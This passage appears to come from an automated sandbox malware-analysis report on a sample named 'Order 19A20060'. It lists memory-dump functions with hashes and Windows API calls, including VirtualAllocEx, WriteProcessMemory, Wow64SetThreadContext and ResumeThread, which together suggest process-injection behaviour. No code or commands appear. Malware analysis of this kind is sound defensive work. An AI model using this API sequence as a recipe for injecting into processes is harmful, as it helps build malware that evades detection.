                                                                              • Opcode Fuzzy Hash: 45f93e52e6d7b13f1679e68aa9fe5fadf29eae90cc5cc83f95d75b958ae09e95
                                                                              • Instruction Fuzzy Hash: 7651B3B4A04218CFEB64DF64C994B9EB7B2FB89300F1085A9E549A7344DB349E85CF51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 7a8e07c-7a8e11d, CreateProcessA called from block 7a8e217-7a8e2d1
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A8E2BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: db5b7152a6aa6a8fb3f18e661e837161b6f8a43adaf1a542512c23bcd7847835
                                                                              • Instruction ID: 3283a5f2c4bf80d0620b8152402b9ac3f8c1a67c454ee8f3ad32cf47b6bc0319
                                                                              • Opcode Fuzzy Hash: db5b7152a6aa6a8fb3f18e661e837161b6f8a43adaf1a542512c23bcd7847835
                                                                              • Instruction Fuzzy Hash: 9BA17BB1D0421ADFDF64DFA8C8407EDBBB2BF88314F0485A9D818A7240D7749985CF92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 7a8e088-7a8e11d, CreateProcessA called from block 7a8e217-7a8e2d1
                                                                              APIs
                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A8E2BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 0739d484394588e0f046dcef6a8d0f5a027b380f2fec2fa470cf320f89241e9a
                                                                              • Instruction ID: 7982c3ab1813e490b6a3c4837fa82766cc66b99a2b66765b2d2682ffe25b23bb
                                                                              • Opcode Fuzzy Hash: 0739d484394588e0f046dcef6a8d0f5a027b380f2fec2fa470cf320f89241e9a
                                                                              • Instruction Fuzzy Hash: 80915CB1D0421ADFDF64DFA8C840BDDBBB2BF88314F1485A9D818A7250DB749985CF92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 300ae70-300ae7f, GetModuleHandleW called from block 300b0a8-300b0d3
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0300B0C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 292eabecd42ae7d0ad7de5f5adcb1c20aaa4862b4948adeb5edbcc36ddcd91e6
                                                                              • Instruction ID: 1c299a189c4b9d46a2b2289ee8fce8c4bd8a6139e36c2926c50e3eeef854b207
                                                                              • Opcode Fuzzy Hash: 292eabecd42ae7d0ad7de5f5adcb1c20aaa4862b4948adeb5edbcc36ddcd91e6
                                                                              • Instruction Fuzzy Hash: 327168B0A01B058FE764DF69C4407AABBF1FF88300F048A2DD486D7A90DB75E949CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 5720aa8-5721d56, CreateWindowExW called from block 5721d73-5721e12
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05721E02
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: 8b9b6b6309fa74174261d6e25236c80400a9bece2e82717f7df233971a7b99e4
                                                                              • Instruction ID: a90b3de0452a328ac41abda252053a33b2ead4aa365de09384eb8873b0296ada
                                                                              • Opcode Fuzzy Hash: 8b9b6b6309fa74174261d6e25236c80400a9bece2e82717f7df233971a7b99e4
                                                                              • Instruction Fuzzy Hash: DC51CFB1D00359DFDB14CFA9C984ADEBBB6FF48310F64812AE819AB210D7719885CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 5721ce5-5721d56, CreateWindowExW called from block 5721db3-5721e12
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05721E02
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: e9aa4d203544b6e28bc0a9eec5ebc4037697ff579cf1a477d009e6fe085132f9
                                                                              • Instruction ID: 5b8150dde858e7832e69234dce75be2a3a07ded2c13c2d465ae10614fbf2f800
                                                                              • Opcode Fuzzy Hash: e9aa4d203544b6e28bc0a9eec5ebc4037697ff579cf1a477d009e6fe085132f9
                                                                              • Instruction Fuzzy Hash: 9D51CEB1D10359DFDB14CFA9C984ADEBBB6BF48310F64852AE819AB210D7719885CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 5720bfc-57242fc, CallWindowProcW called from block 572435a-5724392
                                                                              APIs
                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05724381
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1681183403.0000000005720000.00000040.00000800.00020000.00000000.sdmp, Offset: 05720000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5720000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: CallProcWindow
                                                                              • String ID:
                                                                              • API String ID: 2714655100-0
                                                                              • Opcode ID: 8f984520f780216f911d99dda944193134571dcad68c9100b3e282dc2585462e
                                                                              • Instruction ID: 7c2393df310a8ff9735179a0c9229f54bd46fb086a215a062d7cac3d8ccf5227
                                                                              • Opcode Fuzzy Hash: 8f984520f780216f911d99dda944193134571dcad68c9100b3e282dc2585462e
                                                                              • Instruction Fuzzy Hash: 4F41E7B59003159FCB14CF99C448AAEFBF6FB88314F24C459E519AB321D774A845DFA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 3004248-30059d9, which calls CreateActCtxA
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 030059C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 6c39476e0edb5a37c0a5d3f339364cba26eb4d8f180c5d4b941e14fdc451c68b
                                                                              • Instruction ID: 58eb13f34c98021c88a739deb3c4fad94ee9ae92b8e2864c0925690ef0049f48
                                                                              • Opcode Fuzzy Hash: 6c39476e0edb5a37c0a5d3f339364cba26eb4d8f180c5d4b941e14fdc451c68b
                                                                              • Instruction Fuzzy Hash: F541BFB0C0561DCFDB24DFA9C884B9EBBF5BF49304F24806AD408AB255DB756949CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 300590d-3005914, CreateActCtxA called from block 300591c-30059d9
                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 030059C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 32cc7497542ad4898616c22fc58f4d9382606dd7f84c550ab1c768faaed8567c
                                                                              • Instruction ID: c90c277fe2738579d724fc33c5a4dfe5a7c182bf46aeb6857d47e4ce73eebc8d
                                                                              • Opcode Fuzzy Hash: 32cc7497542ad4898616c22fc58f4d9382606dd7f84c550ab1c768faaed8567c
                                                                              • Instruction Fuzzy Hash: 8641E0B0C00619CEDB24DFA9C8847CEBBF5BF49304F24805AD418AB255DB755949CF90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Graph rendering not reproduced; first basic block 300a898-300a8a0, LoadLibraryExW called from block 300b330-300b35f
                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0300B141,00000800,00000000,00000000), ref: 0300B352
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 5d6ac9a8ad8a10a9e6391d5678a7a6f5906c27d2bfeefefe5928bbb09bc7ce14
                                                                              • Instruction ID: 182a48ef2de1783c30216fc3e2a15496319bf821348a70a32c15fea8589e66b0
                                                                              • Opcode Fuzzy Hash: 5d6ac9a8ad8a10a9e6391d5678a7a6f5906c27d2bfeefefe5928bbb09bc7ce14
                                                                              • Instruction Fuzzy Hash: BE31BDB68053988FEB10DFAAC4546DEBFF0EF49310F14806AD495AB251C3749545CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A8DA90
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 8190d61e1b6a52d46e5d99bf77332b5d8da9627d2ec2cf1bc300ba1a2b423497
                                                                              • Instruction ID: 292576a0cbb06874a9c7427819094caaaee768d8d50a98443877afba0ae911fc
                                                                              • Opcode Fuzzy Hash: 8190d61e1b6a52d46e5d99bf77332b5d8da9627d2ec2cf1bc300ba1a2b423497
                                                                              • Instruction Fuzzy Hash: 7B2137B6900319DFCB10DFA9C981BEEFBF1BF48310F10882AE569A7251D7749954CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A8DB70
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 581638d08d32f954b2c3f535841fa7e3820893367c5caf11dfc5d39a876967ef
                                                                              • Instruction ID: 00619edc5fb74e5195e490cd4f212e01ebe203566a94d28dbc85cf1742c99901
                                                                              • Opcode Fuzzy Hash: 581638d08d32f954b2c3f535841fa7e3820893367c5caf11dfc5d39a876967ef
                                                                              • Instruction Fuzzy Hash: 312148B1900359DFCB10DFAAC884AEEFBF5FF48320F10842AE558A7250C7399944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07A8DA90
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 3e18038fed339dcc1ae163d6d19228b6998ef0e25806a0102a240321a58ddee4
                                                                              • Instruction ID: 9b91e5a318b1f48d8fe070c73c8e48bd72774823301b80681ba58e320b4e6bb4
                                                                              • Opcode Fuzzy Hash: 3e18038fed339dcc1ae163d6d19228b6998ef0e25806a0102a240321a58ddee4
                                                                              • Instruction Fuzzy Hash: 562126B19003599FCB10DFA9C885BDEFBF5FF48310F108829E969A7250D7789944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A8D8E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: faa7b237fcad245c208ce9d286e72a9a08fd811db3059030cdd031bbf65e670b
                                                                              • Instruction ID: 6832cc406c84adf4a078527f5c7c9d04bc3819bab34cfd9af15e3da8fa6d8891
                                                                              • Opcode Fuzzy Hash: faa7b237fcad245c208ce9d286e72a9a08fd811db3059030cdd031bbf65e670b
                                                                              • Instruction Fuzzy Hash: 1F2137B1D003098FDB10DFAAC5857EEBBF0EF88324F14842AD559A7241D7789989CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0300D306,?,?,?,?,?), ref: 0300D3C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 7fa2415d2be241815330a5d5fbaaa88e5c0939c3fa9d95b97c66ab55da361c55
                                                                              • Instruction ID: 12e3ec7a9a969d43d0ba1690ccdd19a759343c601d5ba556c80127c7f0be2444
                                                                              • Opcode Fuzzy Hash: 7fa2415d2be241815330a5d5fbaaa88e5c0939c3fa9d95b97c66ab55da361c55
                                                                              • Instruction Fuzzy Hash: 7A21E3B5901248DFDB10CFAAD584ADEFBF5EB48310F14841AE914A7350D374A954CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07A8DB70
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: 567aac8a6d48620ced86e78fad76cc35fc18767d44efff625c93685cbe3ee8d5
                                                                              • Instruction ID: 31e93833f2ebd5855512ef649860b4e4439ea34c7831dbbd509c736a0f9acb30
                                                                              • Opcode Fuzzy Hash: 567aac8a6d48620ced86e78fad76cc35fc18767d44efff625c93685cbe3ee8d5
                                                                              • Instruction Fuzzy Hash: DF2137B1D003599FCB10DFAAC884AEEFBF5FF48320F10842AE559A7250D7389944CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07A8D8E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: 0eea578f44fc61db275bd9104255f514ae39b1618f901caecb9a511c12c8fc85
                                                                              • Instruction ID: 510789d0f4301777a1edda85d3ab09304f10858cb3c29daec9458ff539d65ec8
                                                                              • Opcode Fuzzy Hash: 0eea578f44fc61db275bd9104255f514ae39b1618f901caecb9a511c12c8fc85
                                                                              • Instruction Fuzzy Hash: 722138B1D003098FDB10DFAAC4857EEBBF4EF88324F108429D459A7240DB789944CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0300D306,?,?,?,?,?), ref: 0300D3C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 76b33d47a02b3e40bd5d77abb61ce941dfccacca0622aa469c58789e066c982e
                                                                              • Instruction ID: 67b2f3a37424e5ce86807a223ca6a94ba396974b8d282d279e906ab9d300b90e
                                                                              • Opcode Fuzzy Hash: 76b33d47a02b3e40bd5d77abb61ce941dfccacca0622aa469c58789e066c982e
                                                                              • Instruction Fuzzy Hash: 2321E0B5901219DFDB10CFA9D985ADEBBF5EB48320F14841AE918A7350D374A944CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A8D9AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 1c3509bf4be3ba80a54d26d70b4be21bf75df7d86cb48d00451d4c723e11e085
                                                                              • Instruction ID: 126364fcd61d4f2075894120dd67bc4e23fc40c21fdf8cf75cbdcd9e6c67fa3c
                                                                              • Opcode Fuzzy Hash: 1c3509bf4be3ba80a54d26d70b4be21bf75df7d86cb48d00451d4c723e11e085
                                                                              • Instruction Fuzzy Hash: 721147B29002499FCB10DFA9D845ADEFFF5EF88324F108819E559A7650C735A944CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0300B141,00000800,00000000,00000000), ref: 0300B352
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 7b81a1f7ffe4a71e39979a042b9257fffdbbd0dd3c14bc99c9a08a71b49097e1
                                                                              • Instruction ID: 87d4652c57ee3aa3e93fc66fbdba0b6df1b0cf6f76ecd991673c1f1477a94780
                                                                              • Opcode Fuzzy Hash: 7b81a1f7ffe4a71e39979a042b9257fffdbbd0dd3c14bc99c9a08a71b49097e1
                                                                              • Instruction Fuzzy Hash: B91123B69003489FDB20CFAAC444ADEFBF4EB48310F14842EE519A7250C3B5A945CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0300B141,00000800,00000000,00000000), ref: 0300B352
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: d5d3aeefa4887b2ddc6bc4ce499dacb0265921794621ef4bb4044aa41c8ed595
                                                                              • Instruction ID: 68d436e917ccd09c4a84dbbc87d2bf6ae5e88f124d3780049af57fba68da5433
                                                                              • Opcode Fuzzy Hash: d5d3aeefa4887b2ddc6bc4ce499dacb0265921794621ef4bb4044aa41c8ed595
                                                                              • Instruction Fuzzy Hash: 2F1123B68003489FDB10CFAAC884BDEFBF4EB48320F14842AD419A7250C375A545CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07A8D9AE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 38d56a713752ed4755e85101c79a84e52b47732157ae19e1057e17240f89d1f0
                                                                              • Instruction ID: 0cd804a0dd02670d3b757d4306ba3a7789e3c3c455e02fe38b54a934be065e95
                                                                              • Opcode Fuzzy Hash: 38d56a713752ed4755e85101c79a84e52b47732157ae19e1057e17240f89d1f0
                                                                              • Instruction Fuzzy Hash: E51137B29002499FCB10DFAAC844BDEFFF5EF88324F108819E559A7250C775A944CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: 1bcd0ac7e50f2f77e6ef6d7016bcf0db04f0c71a9740fc3c0e4ddbc9b75ebeaf
                                                                              • Instruction ID: 42a0f2d48e8437bd8a66b694d1839488c4c16d500683916d816487193c2932fc
                                                                              • Opcode Fuzzy Hash: 1bcd0ac7e50f2f77e6ef6d7016bcf0db04f0c71a9740fc3c0e4ddbc9b75ebeaf
                                                                              • Instruction Fuzzy Hash: B71158B19002598BCB20DFAAD4457DEFBF4EB88324F24882AD459A7650C635A944CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1683106622.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a80000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              • Opcode ID: b751a5173d8674452c07a6ac683d5c4f16caf369bef0e54160b812af9412d39d
                                                                              • Instruction ID: 2ed726115911cfaa0d9077ebc78deed3cfc052c365c60d039bf6901e9d30eb82
                                                                              • Opcode Fuzzy Hash: b751a5173d8674452c07a6ac683d5c4f16caf369bef0e54160b812af9412d39d
                                                                              • Instruction Fuzzy Hash: 071136B1D003598FCB20DFAAC4457DEFBF5EB88324F248829D559A7250CB75A944CFA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0AC01265
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1684561997.000000000AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ac00000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: faead0d455e11fc51c77aa71bd75c62680aca938db725f2fb9e054b88b90a612
                                                                              • Instruction ID: d06ab2ac4694cd5d3c546e2aad620059e1fa60f969c47e273a10c23eb07bd623
                                                                              • Opcode Fuzzy Hash: faead0d455e11fc51c77aa71bd75c62680aca938db725f2fb9e054b88b90a612
                                                                              • Instruction Fuzzy Hash: F511F2B58003499FCB10CF9AD885BDEFFF8EB48324F14845AE558A7650C375A984CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0300B0C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1678082340.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3000000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 67b51af8efcedcedd17da302905ecf28233b9ad9e8b906d6d57a45381ea9367e
                                                                              • Instruction ID: 6a6ad91189bf545125cb10e363cae99c0e94bdb1c2c57e98aba7fe68e5105561
                                                                              • Opcode Fuzzy Hash: 67b51af8efcedcedd17da302905ecf28233b9ad9e8b906d6d57a45381ea9367e
                                                                              • Instruction Fuzzy Hash: E6110FB6C003498FDB20CF9AC544ADEFBF4EB88320F14842AD429A7250D375A549CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostMessageW.USER32(?,?,?,?), ref: 0AC01265
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1684561997.000000000AC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC00000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ac00000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 942fbb9c11367cdc6414c3ae5165d2d780754ac6afd9ec9b07a39e57623029a5
                                                                              • Instruction ID: e9e7fc4d9b6e462b4b26ca7278254455bd1e4b4844e9b0eb1e252bf9f7cdb4f3
                                                                              • Opcode Fuzzy Hash: 942fbb9c11367cdc6414c3ae5165d2d780754ac6afd9ec9b07a39e57623029a5
                                                                              • Instruction Fuzzy Hash: EC1100B5800348DFCB10CF9AC884BDEFBF8EB48324F10841AE558A7250C375A984CFA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1682928578.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a30000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Te^q
                                                                              • API String ID: 0-671973202
                                                                              • Opcode ID: 913c362801238c2da3f31f875005274ba7b995338e5bbf4317b1a6d817e17dfe
